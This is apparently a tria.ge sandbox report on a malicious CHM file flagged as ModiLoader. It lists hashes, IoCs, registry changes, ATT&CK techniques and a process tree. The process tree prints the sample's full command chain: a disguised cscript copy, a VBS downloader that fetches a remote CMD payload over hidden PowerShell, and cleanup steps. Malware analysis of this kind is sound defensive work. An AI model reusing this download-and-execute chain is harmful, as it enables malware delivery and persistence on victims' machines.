Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21/01/2025, 03:01
Static task
static1
Behavioral task
behavioral1
Sample
5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
Resource
win10v2004-20241007-en
General
-
Target
5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm
-
Size
75KB
-
MD5
98191ac03cddd697bed63b0eab761bed
-
SHA1
9ea831063cbdccf9de4b79e195800cac9d5518ad
-
SHA256
5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33
-
SHA512
7313ac3423e2e68e42c58a04b6b945b5b0e6ff1c8aea91fb145cca927d19b0be54b2cb174ef6a8434970b41ed539ce295da6b8246844ddbf3b5735a7b77f4a7d
-
SSDEEP
1536:pbN0IxCKVgZpisZ1MJ0cifP4R232WJniFPurASPDuP/V6McEJh:ZGIkgI1gNi44TJiFP8ASS8ML
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modiloader family
-
ModiLoader Second Stage 61 IoCs
resource yara_rule behavioral1/memory/2744-60-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-142-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-72-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-115-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-113-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-112-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-111-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-109-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-108-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-107-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-103-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-102-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-101-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-99-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-97-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-95-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-94-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-93-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-91-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-90-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-89-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-87-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-86-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-85-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-84-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-82-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-81-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-80-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-78-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-77-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-75-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-74-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-71-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-70-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-69-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-105-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-68-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-98-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-65-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-64-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-138-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-135-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-132-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-129-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-125-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-121-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-117-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-114-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-110-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-106-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-104-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-100-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-96-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-67-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-92-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-66-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-88-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-83-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-79-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-76-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 behavioral1/memory/2744-73-0x0000000003220000-0x0000000004220000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2268 powershell.exe 2864 powershell.exe -
Executes dropped EXE 5 IoCs
pid Process 2936 ript.exe 2744 x.exe 2780 svchost.pif 3036 svchost.pif 2740 ezaitqoJ.pif -
Loads dropped DLL 6 IoCs
pid Process 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2268 powershell.exe 2744 x.exe 2744 x.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\Joqtiaze = "C:\\Users\\Public\\Joqtiaze.url" x.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2308 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 8 drive.google.com 10 drive.google.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2744 set thread context of 2740 2744 x.exe 50 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x.exe -
Kills process with taskkill 1 IoCs
pid Process 2860 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main hh.exe -
Modifies system certificate store 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ript.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ript.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 10 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 12 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2744 x.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2268 powershell.exe 2864 powershell.exe 2864 powershell.exe 2864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2268 powershell.exe Token: SeDebugPrivilege 2864 powershell.exe Token: SeDebugPrivilege 2860 taskkill.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2448 hh.exe 2448 hh.exe -
Suspicious use of WriteProcessMemory 42 IoCs
description pid Process procid_target PID 2448 wrote to memory of 2308 2448 hh.exe 31 PID 2448 wrote to memory of 2308 2448 hh.exe 31 PID 2448 wrote to memory of 2308 2448 hh.exe 31 PID 2308 wrote to memory of 484 2308 cmd.exe 33 PID 2308 wrote to memory of 484 2308 cmd.exe 33 PID 2308 wrote to memory of 484 2308 cmd.exe 33 PID 2308 wrote to memory of 2268 2308 cmd.exe 34 PID 2308 wrote to memory of 2268 2308 cmd.exe 34 PID 2308 wrote to memory of 2268 2308 cmd.exe 34 PID 2268 wrote to memory of 2936 2268 powershell.exe 35 PID 2268 wrote to memory of 2936 2268 powershell.exe 35 PID 2268 wrote to memory of 2936 2268 powershell.exe 35 PID 2308 wrote to memory of 2864 2308 cmd.exe 37 PID 2308 wrote to memory of 2864 2308 cmd.exe 37 PID 2308 wrote to memory of 2864 2308 cmd.exe 37 PID 2864 wrote to memory of 1564 2864 powershell.exe 38 PID 2864 wrote to memory of 1564 2864 powershell.exe 38 PID 2864 wrote to memory of 1564 2864 powershell.exe 38 PID 1564 wrote to memory of 2868 1564 cmd.exe 40 PID 1564 wrote to memory of 2868 1564 cmd.exe 40 PID 1564 wrote to memory of 2868 1564 cmd.exe 40 PID 2308 wrote to memory of 2860 2308 cmd.exe 41 PID 2308 wrote to memory of 2860 2308 cmd.exe 41 PID 2308 wrote to memory of 2860 2308 cmd.exe 41 PID 1564 wrote to memory of 2744 1564 cmd.exe 42 PID 1564 wrote to memory of 2744 1564 cmd.exe 42 PID 1564 wrote to memory of 2744 1564 cmd.exe 42 PID 1564 wrote to memory of 2744 1564 cmd.exe 42 PID 2744 wrote to memory of 2408 2744 x.exe 44 PID 2744 wrote to memory of 2408 2744 x.exe 44 PID 2744 wrote to memory of 2408 2744 x.exe 44 PID 2744 wrote to memory of 2408 2744 x.exe 44 PID 2744 wrote to memory of 2784 2744 x.exe 46 PID 2744 wrote to memory of 2784 2744 x.exe 46 PID 2744 wrote to memory of 2784 2744 x.exe 46 PID 2744 wrote to memory of 2784 2744 x.exe 46 PID 2744 wrote to memory of 2740 2744 x.exe 50 PID 2744 wrote to memory of 2740 2744 x.exe 50 PID 2744 wrote to memory of 2740 2744 x.exe 50 PID 2744 wrote to memory of 2740 2744 x.exe 50 PID 2744 wrote to memory of 2740 2744 x.exe 50 PID 2744 wrote to memory of 2740 2744 x.exe 50
Processes
-
C:\Windows\hh.exe"C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\5ce8a7ef07cbd67618627078f820dae2c0f9e29a4113e498c7aefd1c39b3ad33.chm1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit2⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\system32\extrac32.exeextrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe3⤵PID:484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd"3⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Public\ript.exe"C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/key/PO.CMD C:\\Users\\Public\\df.cmd4⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2936
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Public\df.cmd" "4⤵
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\system32\extrac32.exeextrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵PID:2868
-
-
C:\Users\Admin\AppData\Local\Temp\x.exe"C:\Users\Admin\AppData\Local\Temp\x.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Public\JoqtiazeF.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Users\Public\Libraries\FX.cmd6⤵
- System Location Discovery: System Language Discovery
PID:2784 -
C:\Windows \SysWOW64\svchost.pif"C:\Windows \SysWOW64\svchost.pif"7⤵
- Executes dropped EXE
PID:2780
-
-
C:\Windows \SysWOW64\svchost.pif"C:\Windows \SysWOW64\svchost.pif"7⤵
- Executes dropped EXE
PID:3036
-
-
-
C:\Users\Public\Libraries\ezaitqoJ.pifC:\Users\Public\Libraries\ezaitqoJ.pif6⤵
- Executes dropped EXE
PID:2740
-
-
-
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM hh.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2860
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Window
1Modify Registry
3Subvert Trust Controls
1Install Root Certificate
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
988KB
MD5def78c9fbba5b51a694c94bdd8b90b5c
SHA14c9878326b3964e6aeea86e16800d13a6da7da38
SHA25627a56c231c128fe16361c024507fa1f085e388440233f55842f9a42b5576e71e
SHA5129001f2ea1fa8200030078741573606e55f70a823476987481a66ff2c841ded80541b2a74d2eebc564443e3583d7cbae016009c76214970d0e4fe018da4d91e5f
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD522e3a8e0a3a5b3a63bb69929c0aa9a0a
SHA1a0893fc30e30c47c56cece025f35f21308c6095d
SHA256d342c58bf258371c02119eb9ccd1613ba3f231ea34eb72af378e1e983042a3e6
SHA512e7974918171aee8914c8d52f626af206bb4132753d5646b752eb4da3163915a48646e20f6cf60f8f5f1661bbbeeeb6324cc9db4a407e6f5c9967dddfeec22d79
-
Filesize
11KB
MD5f82aeb3b12f33250e404df6ec873dd1d
SHA1bcf538f64457e8d19da89229479cafa9c4cce12f
SHA25623b7417b47c7efb96fb7ce395e325dc831ab2ee03eadda59058d31bdbe9c1ea6
SHA5126f9d6daeed78f45f0f83310b95f47cc0a96d1db1d7f6c2e2485d7a8ecb04fee9865eec3599fee2d67f3332f68a70059f1a6a40050b93ef44d55632c24d108977
-
Filesize
8KB
MD57821e3de3812e791cf3b223500d73bc9
SHA15e211b634ce77e6fee83ce8a5b8c9a37c8b81e1d
SHA2563daa7f9eee129f61f7a452f7150ee21a1c4141586a37f37842b9c3bb53152a74
SHA5126eae270065401626df97b73a255578bf27b4f4dea480954843823046ad95e40cf706c1a767c8765ef3ab48ea3a18498375614317ec00a9ef29a4dd21edbc5f26
-
Filesize
194B
MD571efa4ec6c67fa5665b1d0c64d60fc25
SHA1f546eda2b94df327b7ad5fa5bb0ba20cd37b2623
SHA25608212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898
SHA5127b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6
-
Filesize
988KB
MD517e6e713ed88991dfadaa8f898f44f39
SHA1ff4ae1fc81e3bf4c853f216aba29d6f1ee40aafe
SHA256993cdeb22d286c12418aa42265112149f4499104fa61cee4f0f0fef2426ea69f
SHA512a3db59c1ec2ec419791dca2140d2cae3c63c1080e133a43b43e5f47c673c1a255b12f71c8e62a9f47026a985f8b1727d18fcf064d70e4605d279a99d98672bf5
-
Filesize
152KB
MD5791af7743252d0cd10a30d61e5bc1f8e
SHA170096a77e202cf9f30c064956f36d14bcbd8f7bb
SHA256e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15
SHA512d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
Filesize
171KB
MD522331abcc9472cc9dc6f37faf333aa2c
SHA12a001c30ba79a19ceaf6a09c3567c70311760aa4
SHA256bdfa725ec2a2c8ea5861d9b4c2f608e631a183fca7916c1e07a28b656cc8ec0c
SHA512c7f5baad732424b975a426867d3d8b5424aa830aa172ed0ff0ef630070bf2b4213750e123a36d8c5a741e22d3999ca1d7e77c62d4b77d6295b20a38114b7843c